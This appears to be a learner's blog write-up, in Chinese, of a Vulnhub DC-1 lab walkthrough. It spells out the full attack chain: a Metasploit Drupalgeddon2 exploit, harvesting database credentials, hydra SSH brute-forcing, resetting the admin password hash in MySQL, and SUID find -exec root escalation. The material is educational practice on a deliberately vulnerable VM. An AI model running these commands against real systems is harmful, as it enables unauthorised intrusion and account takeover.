Vulnhub DC-1靶機滲透學習

前言

之前聽說過這個叫Vulnhub DC-1的靶機，所以想拿來玩玩學習，結果整個過程都是看着別人的writeup走下來的，學藝不精，不過這個過程也認識到，學會了很多東西。

所以才想寫點東西，記錄一下

1.下載

地址https://www.vulnhub.com/entry/dc-1-1,292/

 

 建議用鏡像，快一點

使用Oracle VM VirtualBox打開

 

2.開始

打開虛擬機后。提示需要賬號密碼

 

 

 這個是需要你自己去找的

於是打開kali，vmware的網絡配置使用橋接網絡，用

arp-scan -l

掃描

其中的 Cadmus Computer Systems即為我們的目標，打開前面的192.168.124.76，如圖

 

 這里推薦一個chrome插件，叫wappalyzer，這個可以檢測網站的信息，cms，框架，服務器等等，非常棒。通過這個插件，可以得知這個網站使用的是drupalCMS

在msf中查找對應的信息

search drupal

 

 用第5個，先

set rhosts 192.168.124.76

然后use exploit/unix/webapp/drupal_drupalgeddon2 

再exploit

如圖 

當提示session1 open時，則已經成功進入了

執行命令shell命令獲得shell

輸入ls

 

發現有給flag1.txt的文件，打開看一下 

cat flag1.txt

 

 翻譯翻譯，每一個好的CMS都需要一個配置文件，你也一樣。

找到這個CMS的配置文件（google）

cd sites/default

cat settings.php

 

 這邊看到了flag2

再翻譯翻譯

　　蠻力和字典攻擊不是

　　只有獲得訪問的方法(您將需要訪問)。

　　你能用這些憑證做什么?

意思是讓我不要用暴力破解得方法搞密碼？maybe

同時，下面有數據庫賬號密碼

dbuser R0ck3t

直到現在還沒有拿到登陸的賬號密碼

這邊進入/etc/passwd看一下

 

 發現有個叫flag4的賬號，如何用john +hydra試着暴力破解一下

hydra是kali自帶的，john需要自己安裝，這個網上去找教程，這里不放出來了

hydra -l flag4 -P /root/john-1.8.0/run/password.lst ssh://192.168.124.76

 

 然后密碼就出來了。。。。。

在vm virutalBox上登陸一下

 

 

也可以用kalissh遠程登陸（推薦用這個，vmbox太tm蛋疼了）

ssh flag4@192.168.124.76

 

 然后登陸mysql

mysql -u dbuser -p 

 

 然后開始找東西

show databases；

show tables

發現有一個叫users的表

 

 打開，發現

 

 再百度一波，如何重置drupal的密碼

用update users set pass=‘$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4’ where name=‘admin';

然后用password登陸，這邊這個加密方法我還沒搞懂

 

之后就可以登錄之前的網站(192.168.124.76)了

 

 登陸后，在網站里扒拉來，扒拉去，在左上的content里看到一個叫flag3的玩意

 

 

 發現這是一個提示

 

 Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

提到了find和-exec，提權用的（學藝不精，看的別人的）

 

回到kali

 

find / -perm -u=s -type f 2>/dev/null

find / -type f -name getflag -exec "/bin/sh" \;

提權部分知識參考https://blog.csdn.net/qq_36119192/article/details/84872644

ls

cd ../..

cd /root

cat thefinalflag.txt

 

 然后就算是告一段落了

 

總結

做完這個感覺自己真的很菜，在此總結一下這個過程中了解到的，學到的，以及還不懂的知識

1.arp-scan -l 　　用來掃描局域網內的主機。（參考https://blog.csdn.net/weixin_43221560/article/details/90550294）

2.用 msf5來reach drupal尋找漏洞，配置並使用這些漏洞（一知半解，還得好好學習），

3.ssh遠程連接，如在滲透過程中使用到的  ssh flag4@192.168.124.76。挺方便的

4.john the Ripper +hydra 爆破，（john下載安裝參考https://blog.csdn.net/Romanticduan/article/details/81233479，使用參考https://blog.csdn.net/qq_36119192/article/details/83373895）

hydra -l flag4 -P /root/john-1.8.0/run/password.lst ssh://192.168.124.76（也是一知半解，同樣得學）

5.suid提權

find / -perm -u=s -type f 2>/dev/null

find / -type f -name getflag -exec "/bin/sh" \;

提權部分知識參考https://blog.csdn.net/qq_36119192/article/details/84872644

（這邊應該更重要）

6.熟悉了linux的一些命令，文件

目前來說就想到了這些

先這樣吧